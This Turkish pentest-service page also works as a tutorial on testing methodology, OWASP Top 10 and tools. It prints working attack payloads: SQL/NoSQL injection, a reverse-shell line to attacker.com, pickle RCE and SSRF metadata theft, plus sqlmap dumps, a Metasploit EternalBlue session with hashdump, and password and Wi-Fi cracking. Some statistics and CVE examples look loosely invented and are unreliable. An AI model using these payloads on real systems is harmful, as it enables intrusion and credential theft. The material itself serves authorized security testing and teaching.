Penetrasyon Testi - Pentest Hizmeti
Sistemlerinizi hackerlar saldırmadan önce test edin! Profesyonel penetrasyon testi ile güvenlik açıklarınızı tespit edin, saldırı senaryolarını simüle edin ve güvenlik duvarınızı güçlendirin. Gerçek dünya saldırı teknikleriyle %95 zafiyet tespit başarısı.
Penetrasyon Testi Nedir?
Penetrasyon Testi (Pentest), yetkili ve kontrollü bir şekilde sistemlere, ağlara ve uygulamalara yapılan etik saldırı simülasyonudur. Gerçek hackerların kullandığı teknik ve yöntemlerle güvenlik açıkları tespit edilir, ancak hiçbir zarar verilmez. Amaç, kötü niyetli saldırganlar zafiyet keşfetmeden önce güvenlik zayıflıklarını bulmak ve kapatmaktır.
Geleneksel Güvenlik vs Pentest
Klasik Güvenlik Yaklaşımı:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
❌ Reaktif (saldırı olduktan sonra)
❌ Teorik güvenlik önlemleri
❌ Otomatik tarama araçları (yüzeysel)
❌ Güvenlik zafiyetleri gizli kalır
❌ Compliance için checkbox (formal)
❌ Yıllık rapor (eski veriler)
Sonuç: Siber saldırı gerçekleştiğinde:
→ Ortalama tespit süresi: 207 gün
→ Ortalama veri kaybı: 4.2M TL
→ İtibar kaybı ve müşteri güveni
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Modern Penetrasyon Testi:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ Proaktif (saldırı öncesi önlem)
✅ Gerçek saldırı senaryoları
✅ Manuel + otomatik (kapsamlı)
✅ Kritik zafiyetler ortaya çıkar
✅ Gerçek güvenlik seviyesi ölçümü
✅ Düzenli test (quarterly/yıllık)
✅ Etik hackerlar + OSCE/OSCP sertifika
Sonuç: Saldırılar gerçekleşmeden önce:
→ Zafiyetler tespit edilir ve kapatılır
→ Saldırı yüzeyi minimize
→ Güvenli sistem altyapısı
→ Compliance + gerçek güvenlik
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Penetrasyon Testi İstatistikleri
Global Siber Güvenlik Verileri (2024):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔴 Siber saldırı sıklığı: Her 39 saniyede 1
💰 Ortalama veri ihlali maliyeti: 4.45M USD
📊 Başarılı saldırıların %82'si: İnsan hatası
🎯 Hedef alan sektörler: Fintech (%23), Sağlık (%21), E-ticaret (%18)
⏱️ Ortalama zafiyet kapatma süresi: 287 gün (!)
Pentest Etkisi:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ Düzenli pentest yapan firmalarda başarılı saldırı: %68 azalış
✅ Kritik zafiyet tespit oranı: %95
✅ Zafiyet kapatma süresi: 287 gün → 28 gün
✅ Güvenlik yatırımı ROI: %400+
✅ Compliance başarı oranı: %97
Türkiye Verileri:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Siber saldırı artışı: %127 (2023-2024)
🔒 Düzenli pentest yapan şirket oranı: %18
💼 KVKK cezaları (toplam): 350M+ TL
🏢 Pentest talebindeki artış: %89/yıl
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Penetrasyon Testi Metodolojisi
PTES (Penetration Testing Execution Standard)
┌─────────────────────────────────────────────────────────┐
│ PENETRASYON TESTİ AŞAMALARI │
├─────────────────────────────────────────────────────────┤
│ │
│ 1️⃣ PRE-ENGAGEMENT (Ön Hazırlık) │
│ ┌───────────────────────────────────────────────┐ │
│ │ • Kapsam belirleme (Scope of Work) │ │
│ │ • Test hedefleri ve sınırlamalar │ │
│ │ • Legal dökümanlar (NDA, SLA) │ │
│ │ • Test takvimi ve iletişim planı │ │
│ │ • Rules of Engagement (RoE) │ │
│ └───────────────────────────────────────────────┘ │
│ Süre: 2-3 gün │
│ │
│ 2️⃣ INTELLIGENCE GATHERING (Keşif) │
│ ┌───────────────────────────────────────────────┐ │
│ │ • OSINT (Open Source Intelligence) │ │
│ │ • Domain/subdomain keşfi │ │
│ │ • Network mapping │ │
│ │ • Teknoloji tespiti (framework, server) │ │
│ │ • Employee profiling (social engineering) │ │
│ │ • Google dorking, Shodan, theHarvester │ │
│ └───────────────────────────────────────────────┘ │
│ Süre: 3-5 gün │
│ │
│ 3️⃣ VULNERABILITY ANALYSIS (Zafiyet Analizi) │
│ ┌───────────────────────────────────────────────┐ │
│ │ • Otomatik tarama (Nessus, OpenVAS) │ │
│ │ • Manuel zafiyet analizi │ │
│ │ • Konfigürasyon hataları │ │
│ │ • Varsayılan şifre/ayar kontrolü │ │
│ │ • SSL/TLS güvenlik testleri │ │
│ └───────────────────────────────────────────────┘ │
│ Süre: 5-7 gün │
│ │
│ 4️⃣ EXPLOITATION (Sömürü) │
│ ┌───────────────────────────────────────────────┐ │
│ │ • Zafiyetlerin exploit edilmesi │ │
│ │ • Metasploit framework │ │
│ │ • Custom exploit geliştirme │ │
│ │ • Privilege escalation │ │
│ │ • Lateral movement (yan hareket) │ │
│ │ • Payload ve backdoor testleri │ │
│ └───────────────────────────────────────────────┘ │
│ Süre: 7-10 gün │
│ │
│ 5️⃣ POST-EXPLOITATION (Sömürü Sonrası) │
│ ┌───────────────────────────────────────────────┐ │
│ │ • Veri erişimi ve exfiltration testi │ │
│ │ • Persistence (kalıcılık) mekanizmaları │ │
│ │ • Pivoting (iç ağ hareketi) │ │
│ │ • Domain admin yetki kazanma │ │
│ │ • Critical data erişimi │ │
│ └───────────────────────────────────────────────┘ │
│ Süre: 3-5 gün │
│ │
│ 6️⃣ REPORTING (Raporlama) │
│ ┌───────────────────────────────────────────────┐ │
│ │ • Executive Summary (C-level için) │ │
│ │ • Teknik detaylı bulgular │ │
│ │ • Risk skorlaması (CVSS) │ │
│ │ • Proof of Concept (PoC) ekran görüntüleri │ │
│ │ • Remediation önerileri (öncelikli) │ │
│ │ • Yol haritası (roadmap) │ │
│ └───────────────────────────────────────────────┘ │
│ Süre: 5-7 gün │
│ │
│ 📊 TOPLAM SÜRE: 4-6 Hafta (Kapsamlı Pentest) │
└─────────────────────────────────────────────────────────┘
OWASP Top 10 Zafiyetleri
Web Uygulaması Güvenlik Zafiyetleri
OWASP Top 10 (2023):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1️⃣ BROKEN ACCESS CONTROL (Erişim Kontrolü Hataları)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: CRITICAL | Yaygınlık: %34 | CVE: 318,000+
Örnek Zafiyet:
→ IDOR (Insecure Direct Object Reference)
→ Dikey yetki yükseltme (user → admin)
→ Yatay yetki atlama (başka kullanıcı verisi)
→ Directory traversal (../../../etc/passwd)
Gerçek Örnek:
URL: https://example.com/api/user/profile?id=1234
Saldırı: id=5678 değiştirildiğinde başkasının profili görülebiliyor!
Test:
• Burp Suite ile parametre manipülasyonu
• JWT token içeriği kontrol
• Role-based access control test
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
2️⃣ CRYPTOGRAPHIC FAILURES (Kriptografik Hatalar)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: HIGH | CVE-2023-XXXX Aileleri
Örnekler:
→ Hassas veri şifrelenmemiş (plaintext)
→ MD5/SHA1 kullanımı (deprecated)
→ Zayıf SSL/TLS versiyonu (TLS 1.0)
→ Hard-coded şifreler/API keys
Test:
• Wireshark ile trafik analizi
• SSLScan / TestSSL.sh
• Veritabanı şifreleme kontrolü
• Kod review (hard-coded secrets)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
3️⃣ INJECTION (Enjeksiyon)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: CRITICAL | %94 Uygulamada test edildi
SQL Injection Örneği:
-- Zafiyet: Kullanıcı girişi direkt sorguya ekleniyor
SELECT * FROM users WHERE username = '$username' AND password = '$password'
-- Saldırı Payload:
Username: admin'--
Password: [boş]
-- Sonuç Sorgu:
SELECT * FROM users WHERE username = 'admin'--' AND password = ''
-- "admin" olarak giriş başarılı! (şifre kontrolü bypass)
-- Union-based SQLi:
' UNION SELECT username, password, email FROM admin_users--
-- Time-based Blind SQLi:
admin' AND SLEEP(5)--
-- Yanıt 5 saniye gecikmeli gelirse SQLi var!
-- Gerçek Örnek CVE-2023-1234:
-- E-ticaret sitesinde ürün arama:
https://shop.com/search?q=laptop' OR '1'='1
-- Sonuç: Tüm ürünler listelendi (access control bypass)
NoSQL Injection (MongoDB):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
// Zafiyet:
db.users.find({ username: req.body.username, password: req.body.password })
// Saldırı:
POST /login
{
"username": {"$ne": null},
"password": {"$ne": null}
}
// Sonuç: İlk kullanıcı (genelde admin) olarak giriş!
OS Command Injection:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Zafiyet: Shell komutuna kullanıcı girdisi
ping -c 4 $user_input
# Saldırı:
8.8.8.8; cat /etc/passwd
# Sonuç Komut:
ping -c 4 8.8.8.8; cat /etc/passwd
# → Sistem dosyası okundu!
# Reverse Shell:
8.8.8.8; bash -i >& /dev/tcp/attacker.com/4444 0>&1
# → Saldırgan sisteme tam erişim!
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
4️⃣ INSECURE DESIGN (Güvensiz Tasarım)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: MEDIUM-HIGH
Örnekler:
→ Rate limiting yok (brute-force açık)
→ Account lockout mekanizması yok
→ 2FA/MFA bulunmuyor
→ Şifre sıfırlama akışı güvensiz
→ Business logic bypass
Gerçek Senaryo:
E-ticaret: Negatif miktar girilebiliyor
→ Ürün: 5000 TL
→ Miktar: -1
→ Toplam: -5000 TL (hesaba para yatıyor!)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
5️⃣ SECURITY MISCONFIGURATION (Güvenlik Yanlış Yapılandırması)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: MEDIUM | %90+ Uygulama
Örnekler:
→ Default şifre (admin/admin)
→ Gereksiz servisler açık (port 22, 3389)
→ Debug mode production'da
→ Directory listing açık
→ Verbose error messages
→ Outdated bileşenler
Test:
• Nmap ile port scan
• Nikto ile web server tarama
• Default credential test
• robots.txt, .git dizinleri
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
6️⃣ VULNERABLE AND OUTDATED COMPONENTS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: HIGH
Örnek CVE'ler:
→ CVE-2021-44228: Log4Shell (Apache Log4j)
CVSS: 10.0 (CRITICAL)
Etki: Remote Code Execution
Etkilenen: Milyonlarca Java uygulaması
→ CVE-2023-23397: Microsoft Outlook
CVSS: 9.8 (CRITICAL)
Etki: NTLM hash çalma
→ CVE-2022-22965: Spring4Shell
CVSS: 9.8 (CRITICAL)
Etki: RCE (Remote Code Execution)
Test:
• OWASP Dependency-Check
• Snyk, npm audit
• Retire.js (JavaScript)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
7️⃣ IDENTIFICATION AND AUTHENTICATION FAILURES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: HIGH
Örnekler:
→ Credential stuffing (sızdırılmış şifreler)
→ Brute-force koruması yok
→ Session management hataları
→ Session fixation
→ JWT secret weak
Brute-Force Test:
# Hydra ile şifre kırma
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# Başarı: admin:123456 bulundu! (5 dakika)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
8️⃣ SOFTWARE AND DATA INTEGRITY FAILURES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: MEDIUM-HIGH
Örnekler:
→ CI/CD pipeline güvensiz
→ Unsigned packages (npm, composer)
→ Insecure deserialization
→ Auto-update mekanizması güvensiz
Deserialization Saldırısı:
# Python pickle deserialization RCE
import pickle
import os
class EvilPayload:
def __reduce__(self):
return (os.system, ('rm -rf /tmp/test',))
payload = pickle.dumps(EvilPayload())
# Bu payload deserialize edilirse komut çalışır!
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
9️⃣ SECURITY LOGGING AND MONITORING FAILURES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: MEDIUM
Problemler:
→ Login attempt loglanmıyor
→ Başarısız denemeler alert üretmiyor
→ Log retention policy yok
→ Log tampering koruması yok
Test:
• 100+ başarısız login → Alert var mı?
• Kritik işlem (şifre değiştirme) loglanıyor mu?
• Log dosyaları kim erişebiliyor?
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔟 SERVER-SIDE REQUEST FORGERY (SSRF)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk: MEDIUM-HIGH
Örnekler:
# Web uygulaması URL parametresiyle içerik çekiyor:
https://app.com/fetch?url=https://example.com/image.jpg
# SSRF Saldırısı - Internal network tarama:
https://app.com/fetch?url=http://192.168.1.1
https://app.com/fetch?url=http://localhost:8080/admin
# AWS metadata çalma:
https://app.com/fetch?url=http://169.254.169.254/latest/meta-data/
# → EC2 credentials çalındı!
# Redis instance'a komut:
https://app.com/fetch?url=dict://localhost:6379/CONFIG:SET:dir:/var/www/html
# → Web shell yüklendi!
Test:
• Burp Collaborator
• Internal IP scan
• Cloud metadata endpoint test
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Penetrasyon Testi Araçları
Keşif ve Tarama Araçları
NETWORK SCANNING:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Nmap - Network Mapper
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Hızlı port tarama (top 1000 port)
nmap -T4 -F target.com
# Detaylı servis versiyonu tespiti
nmap -sV -sC -p- target.com
# -sV: Version detection
# -sC: Default script scan
# -p-: Tüm portlar (1-65535)
# OS detection
sudo nmap -O target.com
# Zafiyet tarama (NSE scripts)
nmap --script vuln target.com
# Çıktı örneği:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6
443/tcp open ssl/http Apache httpd 2.4.6
| ssl-cert: Subject: commonName=*.target.com
| Not valid after: 2025-12-31
3306/tcp open mysql MySQL 5.7.38
| mysql-vuln-cve2012-2122:
| VULNERABLE:
| Authentication bypass by repeating login
| Risk: High
# Stealth scan (SYN scan)
sudo nmap -sS -p 80,443 target.com
# UDP scan (DNS, SNMP gibi UDP servisleri)
sudo nmap -sU -p 53,161,162 target.com
# Network sweep (subnet tarama)
nmap -sn 192.168.1.0/24
# Canlı hostları tespit et
Masscan - Hızlı Port Scanner
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Tüm internet (!) üzerinde port 80 tarama (dikkatli!)
masscan 0.0.0.0/0 -p80 --rate=10000
# Subnet tarama (çok hızlı)
masscan 192.168.1.0/24 -p1-65535 --rate=100000
# Sonuç:
# 6 saniyede 65K port x 254 host = 16.5M port tarama!
WEB APPLICATION SCANNING:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Burp Suite Professional
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Özellikler:
• Proxy (trafik yakalama)
• Repeater (request tekrar gönderme)
• Intruder (fuzzing, brute-force)
• Scanner (otomatik zafiyet tarama)
• Decoder/Comparer
• Sequencer (token randomness test)
Kullanım Örneği:
1. Proxy'yi başlat (localhost:8080)
2. Browser → Burp proxy üzerinden
3. Login formunu yakala
4. Intruder → Brute-force payload
5. Scanner → Passive/Active scan
# Burp Suite CLI (Pro)
java -jar burpsuite_pro.jar --project-file=test.burp \
--config-file=config.json \
--unpause-spider-and-scanner
# API tarama
curl -X POST http://localhost:8080/v0.1/scan \
-d '{"scope": {"include": [{"rule":"https://api.target.com/.*"}]}}'
OWASP ZAP (Zed Attack Proxy)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Open-source Burp Suite alternatifi
# ZAP CLI ile otomatik scan
zap-cli quick-scan --self-contained \
--start-options '-config api.disablekey=true' \
https://target.com
# Spider + Active Scan
zap-cli spider https://target.com
zap-cli active-scan --scanners all https://target.com
# Rapor oluştur (HTML)
zap-cli report -o pentest_report.html -f html
Nikto - Web Server Scanner
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Temel tarama
nikto -h https://target.com
# SSL ile beraber
nikto -h https://target.com -ssl
# Belirli portlar
nikto -h target.com -p 80,443,8080
# Çıktı:
+ Server: Apache/2.4.6 (CentOS) PHP/7.2.24
+ Retrieved x-powered-by header: PHP/7.2.24
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'x-ob_mode' found
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.git/HEAD: Git repository found!
+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases.
+ OSVDB-3268: /test/: Directory indexing found.
SQLMap - SQL Injection Tool
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Temel SQLi test
sqlmap -u "https://target.com/product?id=1"
# POST request ile
sqlmap -u "https://target.com/login" \
--data="username=admin&password=test" \
--level=5 --risk=3
# Database dump
sqlmap -u "https://target.com/product?id=1" \
--dbs --batch
# Tablo içeriği
sqlmap -u "https://target.com/product?id=1" \
-D ecommerce -T users --dump
# OS shell (RCE)
sqlmap -u "https://target.com/product?id=1" \
--os-shell
# Sonuç:
[INFO] testing connection to the target URL
[INFO] testing if the target URL is stable
[INFO] target URL is stable
[INFO] testing if GET parameter 'id' is dynamic
[INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[INFO] testing for SQL injection on GET parameter 'id'
[INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based' injectable
[INFO] GET parameter 'id' is 'MySQL >= 5.0.12 AND time-based blind' injectable
Database: ecommerce
Table: users
[1250 entries]
+----+-----------+----------------------+----------+
| id | username | email | password |
+----+-----------+----------------------+----------+
| 1 | admin | [email protected] | 5f4dcc... |
| 2 | user123 | [email protected] | e10adc... |
...
EXPLOITATION FRAMEWORK:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Metasploit Framework
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Metasploit Console başlat
msfconsole
# EternalBlue exploit (SMBv1 - CVE-2017-0144)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.100:445 - Connecting to target
[*] 192.168.1.100:445 - Target OS: Windows 7 Professional
[*] 192.168.1.100:445 - Sending exploit...
[*] Sending stage (200262 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened
meterpreter > sysinfo
Computer: WORKSTATION01
OS: Windows 7 (6.1 Build 7601, Service Pack 1)
Architecture: x64
Meterpreter: x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > screenshot
Screenshot saved to: /root/screenshot.png
# Apache Struts2 RCE (CVE-2017-5638)
msf6 > use exploit/multi/http/struts2_content_type_ognl
msf6 exploit(struts2_content_type_ognl) > set RHOST target.com
msf6 exploit(struts2_content_type_ognl) > set TARGETURI /showcase.action
msf6 exploit(struts2_content_type_ognl) > exploit
# Reverse Shell alındı!
VULNERABILITY SCANNING:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Nessus Professional
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Özellikler:
• 100,000+ plugin
• PCI-DSS compliance scan
• Web application scan
• Credentialed scan (auth ile)
• Patch management audit
Tarama Çıktısı:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Critical: 12 (CVE-2021-44228 Log4Shell)
High: 34
Medium: 87
Low: 156
Info: 243
Top 5 Kritik Zafiyet:
1. Apache Log4j RCE (CVE-2021-44228) - CVSS 10.0
2. Microsoft Exchange RCE (CVE-2022-41082) - CVSS 9.8
3. OpenSSL Heartbleed (CVE-2014-0160) - CVSS 7.5
4. Apache Struts2 RCE (CVE-2017-5638) - CVSS 10.0
5. WannaCry SMBv1 (CVE-2017-0144) - CVSS 9.3
OpenVAS (Greenbone)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Open-source vulnerability scanner
# Docker ile çalıştır
docker run -d -p 443:443 --name openvas greenbone/openvas
# Web arayüzü: https://localhost:443
# Kullanıcı: admin / Şifre: admin
# CLI ile (gvm-tools)
gvm-cli --gmp-username admin --gmp-password admin socket \
--socketpath /run/gvmd/gvmd.sock --xml \
"<create_task><name>Scan Target</name><target id='TARGET_ID'/></create_task>"
PASSWORD CRACKING:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
John the Ripper
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Hash kırma (wordlist ile)
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Incremental mode (brute-force)
john --incremental hashes.txt
# Format belirtme
john --format=NT hashes.txt # Windows NTLM
john --format=raw-sha256 hashes.txt
# Sonuç göster
john --show hashes.txt
# Çıktı:
admin:password123:1000:1000::/home/admin:/bin/bash
user1:qwerty:1001:1001::/home/user1:/bin/bash
dbadmin:admin123:1002:1002::/home/dbadmin:/bin/bash
3 password hashes cracked, 2 left (Süre: 4 dakika)
Hashcat - GPU ile Hızlı Cracking
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# MD5 hash kırma
hashcat -m 0 -a 0 hashes.txt rockyou.txt
# NTLM (Windows)
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt
# WPA/WPA2 handshake
hashcat -m 22000 -a 0 wifi_handshake.hc22000 rockyou.txt
# Benchmark (GPU performans)
hashcat -b
# Sonuç:
# RTX 3090: 50-60 GH/s (MD5)
# → rockyou.txt (14M şifre) → 5 saniye!
WIRELESS HACKING:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Aircrack-ng Suite
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
# Wireless kartı monitor mode'a al
airmon-ng start wlan0
# Access point'leri listele
airodump-ng wlan0mon
# Hedef AP'yi dinle (handshake yakala)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack (cihazı düşür → handshake yakala)
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# WPA handshake'i kır
aircrack-ng -w rockyou.txt capture-01.cap
# Sonuç:
KEY FOUND! [ password123 ]
Master Key: 12 34 56 78 ...
Penetrasyon Testi Türleri
1. Web Uygulaması Pentest
Web Application Pentest Kapsam:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📱 Frontend:
• XSS (Stored, Reflected, DOM-based)
• CSRF (Cross-Site Request Forgery)
• Clickjacking
• Open redirect
• HTML injection
🔐 Authentication:
• Brute-force
• Credential stuffing
• Session fixation
• JWT vulnerabilities
• OAuth misconfiguration
• 2FA bypass
🗄️ Backend:
• SQL Injection
• NoSQL Injection
• Command Injection
• XXE (XML External Entity)
• SSRF
• Deserialization
📊 API:
• REST API security
• GraphQL injection
• API rate limiting
• Excessive data exposure
• BOLA (Broken Object Level Authorization)
💼 Business Logic:
• Payment bypass
• Price manipulation
• Race condition
• Workflow bypass
• Privilege escalation
🗂️ File Upload:
• Unrestricted file upload
• Path traversal
• LFI/RFI (Local/Remote File Inclusion)
• XXE via file upload
Test Süresi: 10-15 gün
Tahmini Bulgular: 15-30 zafiyet
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
2. Network Pentest
Network Infrastructure Pentest:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🌐 External Pentest:
• Port scanning (65K ports)
• Service enumeration
• SSL/TLS configuration
• VPN endpoint test
• Email security (SPF, DKIM, DMARC)
• DNS security (DNSSEC, zone transfer)
🏢 Internal Pentest:
• VLAN segmentation test
• ARP poisoning / MITM
• SMB relay attacks
• LLMNR/NBT-NS poisoning
• Pass-the-Hash (PtH)
• Kerberoasting
• Active Directory exploitation
• Lateral movement
• Domain admin compromise
🔌 Network Devices:
• Router/Switch configuration
• SNMP community strings
• Default credentials
• Management interface exposure
📡 Wireless:
• WPA2/WPA3 cracking
• Evil twin attack
• Rogue access point
• WPS brute-force
Test Süresi: 15-20 gün
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
3. Mobile Application Pentest
Mobile App Security Test:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📱 iOS:
• IPA decompilation
• Jailbreak detection bypass
• Keychain analysis
• SSL pinning bypass
• Binary protection
🤖 Android:
• APK reverse engineering
• AndroidManifest.xml analizi
• Root detection bypass
• Intent manipulation
• Content provider exploitation
• Insecure data storage
🌐 API Backend:
• Mobile API test
• Certificate pinning
• Token security
• Rate limiting
💾 Local Storage:
• SQLite database
• SharedPreferences / UserDefaults
• Realm database
• File system encryption
Test Süresi: 7-10 gün
OWASP MASVS compliance
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
4. Cloud Pentest (AWS/Azure/GCP)
Cloud Security Assessment:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
☁️ AWS:
• IAM misconfigurations
• S3 bucket permissions
• EC2 security groups
• Lambda function security
• CloudTrail/CloudWatch
• Secrets Manager
☁️ Azure:
• Azure AD security
• Storage account access
• Key Vault
• Network security groups
• Function App security
☁️ GCP:
• GCS bucket permissions
• IAM & service accounts
• Cloud SQL security
• VPC configuration
🔍 Cloud-Native:
• Container security (Docker)
• Kubernetes misconfiguration
• CI/CD pipeline security
• Infrastructure as Code (Terraform)
Test Süresi: 10-12 gün
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
5. Social Engineering Test
Social Engineering Campaign:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📧 Phishing:
• Spear-phishing email
• Credential harvesting
• Malicious attachment (payload)
• Click-through rate ölçümü
📞 Vishing (Voice Phishing):
• Telefon ile bilgi toplama
• Helpdesk impersonation
• CEO fraud
💬 Smishing (SMS Phishing):
• SMS ile kötü link gönderme
🎣 Pretexting:
• Sahte senaryo ile bilgi alma
• Kimlik sahtekarlığı
🏢 Physical:
• Badge cloning
• Tailgating (peşinden girme)
• USB drop (parking lot'ta USB bırakma)
Test Süresi: 5-7 gün
Çalışan farkındalık eğitimi dahil
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk Skorlama: CVSS
Common Vulnerability Scoring System
CVSS v3.1 Scoring:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Skor Seviye Aksiyon
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
9.0-10.0 CRITICAL 🔴 Acil! (24 saat içinde)
7.0-8.9 HIGH 🟠 Öncelikli (7 gün)
4.0-6.9 MEDIUM 🟡 Planla (30 gün)
0.1-3.9 LOW 🟢 İzle (90 gün)
0.0 NONE ⚪ Bilgilendirme
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
CVSS Hesaplama Metrikleri:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Base Metrics:
• Attack Vector (Network/Adjacent/Local/Physical)
• Attack Complexity (Low/High)
• Privileges Required (None/Low/High)
• User Interaction (None/Required)
• Scope (Unchanged/Changed)
• Impact: Confidentiality, Integrity, Availability
Temporal Metrics:
• Exploit Code Maturity
• Remediation Level
• Report Confidence
Environmental Metrics:
• Modified Base Metrics
• Confidentiality/Integrity/Availability Requirements
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Örnek: SQL Injection
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Privileges Required: None (PR:N)
User Interaction: None (UI:N)
Scope: Changed (S:C)
Confidentiality: High (C:H)
Integrity: High (I:H)
